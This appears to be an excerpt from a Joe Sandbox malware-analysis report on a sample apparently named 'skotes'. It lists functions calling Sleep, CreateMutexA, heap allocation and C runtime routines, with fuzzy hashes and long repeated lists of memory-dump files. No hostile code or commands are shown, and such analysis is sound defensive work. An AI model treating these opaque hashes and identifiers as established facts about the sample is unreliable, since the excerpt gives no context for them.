Associated: 00000003.00000002.2207127169.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207148465.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 453b5438fd39c563708fc064c642fca66bc139ec8c87d981410ab7a8a27a8aac
Instruction ID: 5c07f083b0d58d35ec39e8d657c945705d80e5232b59c0fae5f7785a2b0629e6
Opcode Fuzzy Hash: 453b5438fd39c563708fc064c642fca66bc139ec8c87d981410ab7a8a27a8aac
Instruction Fuzzy Hash: F9217F30745215CBFF2867A8F99A73EB262DF81305FA40416F208D63C1CB7659A08663

Function 0012A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000003.00000002.2205847431.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000003.00000002.2205824705.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205847431.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205927950.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205949385.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205971348.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205992873.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206013842.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206148326.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206168974.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206227856.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206247434.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206263959.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206283873.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206306918.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206329581.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206350306.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206374544.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206407250.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206432061.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206455967.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206478199.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206501746.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206522347.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206543318.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206559138.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206580726.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206602866.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206625518.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206650381.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206672970.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206696676.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206719289.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206743848.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206768099.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206803246.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206880187.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206972970.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206993459.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207017448.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207037413.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207059319.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207083227.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207105093.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207127169.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207148465.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5ee9db61017443938a4f3b0c6dc701e65a52591d877250ace4d9b4dbbbd9428b
Instruction ID: 7d5f62ecb6cea495c4845305b7df240845ffe7ef98868db650ab199ebce652c6
Opcode Fuzzy Hash: 5ee9db61017443938a4f3b0c6dc701e65a52591d877250ace4d9b4dbbbd9428b
Instruction Fuzzy Hash: 972179317002009BFF18DB68FC9976DB772EFD2315F244219E414976D5C7766AD08362

Function 0015D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0015A813,00000001,00000364,00000006,000000FF,?,0015EE3F,?,00000004,00000000,?,?), ref: 0015D871

Memory Dump Source

Source File: 00000003.00000002.2205847431.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000003.00000002.2205824705.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205847431.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205927950.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205949385.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205971348.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205992873.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206013842.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206148326.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206168974.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206227856.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206247434.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206263959.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206283873.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206306918.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206329581.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206350306.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206374544.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206407250.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206432061.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206455967.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206478199.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206501746.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206522347.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206543318.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206559138.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206580726.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206602866.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206625518.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206650381.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206672970.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206696676.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206719289.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206743848.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206768099.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206803246.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206880187.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206972970.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206993459.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207017448.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207037413.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207059319.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207083227.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207105093.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207127169.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207148465.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4484cf0380311a66e634828eb9d587838907d53b65dafde65099cafacd735ef3
Instruction ID: c717c4862c09474a4a96e02e97cc604a47a8c161ecc115490e949297e243e0b0
Opcode Fuzzy Hash: 4484cf0380311a66e634828eb9d587838907d53b65dafde65099cafacd735ef3
Instruction Fuzzy Hash: 7EF0E931601524E6EB312A72BC01B5B3759DF55373B158021EC38EF181DB20EC1C87E1

Non-executed Functions

Function 00122EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00122F5F
__Mtx_unlock.LIBCPMT ref: 00122FCC
__Cnd_broadcast.LIBCPMT ref: 00122FE3
__Mtx_unlock.LIBCPMT ref: 001230F5
__Mtx_unlock.LIBCPMT ref: 0012319B

Memory Dump Source

Source File: 00000003.00000002.2205847431.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000003.00000002.2205824705.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205847431.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205927950.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205949385.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205971348.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205992873.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206013842.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206148326.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206168974.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206227856.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206247434.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206263959.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206283873.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206306918.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206329581.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206350306.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206374544.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206407250.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206432061.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206455967.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206478199.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206501746.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206522347.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206543318.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206559138.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206580726.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206602866.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206625518.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206650381.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206672970.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206696676.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206719289.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206743848.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206768099.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206803246.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206880187.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206972970.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206993459.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207017448.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207037413.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207059319.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207083227.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207105093.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207127169.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207148465.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 900e6e9e68776fe1e471b7ef907a4737088adade586f1717aec949dbdb8a0119
Instruction ID: 0499bbf0d47fa2e84ce0669b57631b24292c550cdafedd9a8e6470f09499f7ea
Opcode Fuzzy Hash: 900e6e9e68776fe1e471b7ef907a4737088adade586f1717aec949dbdb8a0119
Instruction Fuzzy Hash: F6A103B0A01225EFDB10DF64D945B5AB7F8FF25320F048129E825E7241EB75EA24CBE1

Function 0015CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0015CC66

Memory Dump Source

Source File: 00000003.00000002.2205847431.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000003.00000002.2205824705.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205847431.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205927950.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205949385.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205971348.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205992873.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206013842.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206148326.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206168974.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206227856.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206247434.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206263959.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206283873.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206306918.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206329581.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206350306.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206374544.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206407250.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206432061.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206455967.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206478199.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206501746.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206522347.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206543318.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206559138.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206580726.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206602866.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206625518.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206650381.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206672970.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206696676.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206719289.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206743848.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206768099.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206803246.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206880187.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206972970.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206993459.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207017448.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207037413.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207059319.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207083227.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207105093.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207127169.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207148465.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction ID: f1b9cbba81c69dfd6ae3156f03a044e83ea456eee472baa3fa115c9b0089e69e
Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction Fuzzy Hash: FCB10F32900346DFDB158F68C8827AEBFA5EF55341F15416AEC65EF241D7348909CBE0

Function 0013BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0013BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0013BBE4
_xtime_get.LIBCPMT ref: 0013BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0013BC13

Memory Dump Source

Source File: 00000003.00000002.2205847431.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000003.00000002.2205824705.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205847431.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205927950.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205949385.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205971348.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205992873.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206013842.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206148326.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206168974.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206227856.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206247434.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206263959.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206283873.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206306918.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206329581.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206350306.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206374544.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206407250.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206432061.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206455967.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206478199.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206501746.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206522347.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206543318.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206559138.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206580726.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206602866.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206625518.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206650381.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206672970.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206696676.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206719289.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206743848.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206768099.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206803246.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206880187.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206972970.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206993459.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207017448.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207037413.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207059319.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207083227.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207105093.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207127169.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
